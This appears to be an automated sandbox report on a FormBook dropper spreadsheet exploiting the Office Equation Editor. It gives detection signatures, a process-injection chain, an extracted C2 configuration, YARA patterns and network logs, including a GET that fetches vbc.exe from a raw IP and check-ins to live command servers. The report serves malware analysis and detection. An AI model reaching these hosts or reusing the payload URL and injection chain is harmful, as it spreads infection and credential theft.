Windows Analysis Report ORDER CONFIRMATION.xlsx

Overview

General Information

Sample Name: ORDER CONFIRMATION.xlsx
Analysis ID: 483668
MD5: e1e18c326feb4aea3a983f390e0e36c2
SHA1: 7d0abdd1c61dac8dfb411fde050381149fa1aaff
SHA256: a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
Tags: Formbook, VelvetSweatshop, xlsx
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2808 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2976 cmdline: 'C:\Users\Public\vbc.exe' MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 836 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 2636 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • ipconfig.exe (PID: 1012 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
          • cmd.exe (PID: 2688 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hanlansmojitovillage.net/nthe/"], "decoy": ["omelhorcurso-online.com", "ttjk020.com", "urfavvpimp.com", "touchmytag.com", "allianzbersamamu.com", "menucoders.com", "goldmig.com", "optplm.com", "ramblersattic.com", "thehendrixcollection.com", "angelsmoonsexshop.com", "indianajones.club", "tageslinsen.info", "thscore2.com", "onpar-golf.com", "youcanaskmeto.review", "overseaexpert.com", "1977991.com", "eurolajd.com", "thefoxshack.com", "bubblelized.com", "texasvoterregistration.com", "denme.net", "sprtnet.com", "aedenpure.com", "yourdoor.pro", "oakridge-pm.com", "swoldiersnation.com", "com-security.center", "prostockbeisbol.com", "mailbroadcastdelivery.club", "fihglobal.com", "hiphopventuresllc.com", "ambrieclothing.com", "colorfulcreativeco.com", "mysahuarita.com", "gibadugi.com", "asoboawa.com", "requotation.com", "wolford.mobi", "ndfvkwnew.icu", "thaysay.net", "thaibinhgear.com", "minhscribe.com", "americanstonesusa.com", "dindigulvysya.com", "tomrings.com", "plasticplank.com", "societegenerol.com", "jrufexsh.com", "ujulus.club", "cpb.site", "bhfhf.com", "yamano-ue.com", "vivorelle.com", "groundedheavens.com", "realstyleworks.com", "vicdux.world", "kegeratorcollective.com", "gamemavn.com", "authorjameswshepherdonline.com", "kankanlol.com", "renatradingbv.com", "ponnyridning.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Sigma Overview

      Exploits:

      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network Connection, Author: Joe Security, Data: DestinationIp: 198.23.212.143, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2808, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976
      Sigma detected: Execution from Suspicious Folder
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
      Multi AV Scanner detection for submitted file
      Source: ORDER CONFIRMATION.xlsx, Virustotal: Detection: 32%
      Source: ORDER CONFIRMATION.xlsx, ReversingLabs: Detection: 29%
      Yara detected FormBook
      Source: Yara match, File source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P, Avira URL Cloud: Label: malware
      Source: http://198.23.212.143/ddr/vbc.exe, Avira URL Cloud: Label: malware
      Machine Learning detection for dropped file
      Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, Joe Sandbox ML: detected
      Source: 8.2.vbc.exe.400000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
      Source: global traffic, DNS query: name: www.americanstonesusa.com
      Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
      Source: excel.exe, Memory has grown: Private usage: 4MB later: 69MB

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe, Domain query: www.americanstonesusa.com
      Source: C:\Windows\explorer.exe, Network Connect: 34.98.99.30 80
      Source: C:\Windows\explorer.exe, Domain query: www.realstyleworks.com
      Source: C:\Windows\explorer.exe, Domain query: www.plasticplank.com
      Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe, Network Connect: 192.99.131.252 80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: www.hanlansmojitovillage.net/nthe/
      Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox View, ASN Name: OVHFR OVHFR
      Source: global traffic, HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1 Host: www.americanstonesusa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1 Host: www.plasticplank.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1 Host: www.realstyleworks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1 Host: www.authorjameswshepherdonline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1 Host: www.hanlansmojitovillage.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1 Host: www.thaysay.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1 Host: www.onpar-golf.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 16:16:33 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9 Last-Modified: Wed, 15 Sep 2021 03:32:23 GMT ETag: "87e00-5cc0058a7b386" Accept-Ranges: bytes Content-Length: 556544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
      Source: global traffic, HTTP traffic detected: GET /ddr/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.23.212.143 Connection: Keep-Alive
      Source: unknown, TCP traffic detected without corresponding DNS query: 198.23.212.143
      Source: ipconfig.exe, 0000000B.00000002.688497436.00000000026B2000.00000004.00020000.sdmp, String found in binary or memory: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emf
      Source: unknown, DNS traffic detected: queries for: www.americanstonesusa.com
      Source: global traffic, HTTP traffic detected:
        GET /ddr/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 198.23.212.143
        Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
        Host: www.americanstonesusa.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
        Host: www.plasticplank.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
        Host: www.realstyleworks.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
        Host: www.authorjameswshepherdonline.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
        Host: www.hanlansmojitovillage.net
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
        Host: www.thaysay.net
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic, HTTP traffic detected:
        GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
        Host: www.onpar-golf.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match, File source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      .NET source code contains very large strings
      Source: vbc[1].exe.4.dr, Forms/mainForm.cs, Long String: Length: 38272
      Source: vbc.exe.4.dr, Forms/mainForm.cs, Long String: Length: 38272
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs, Long String: Length: 38272
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs, Long String: Length: 38272
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs, Long String: Length: 38272
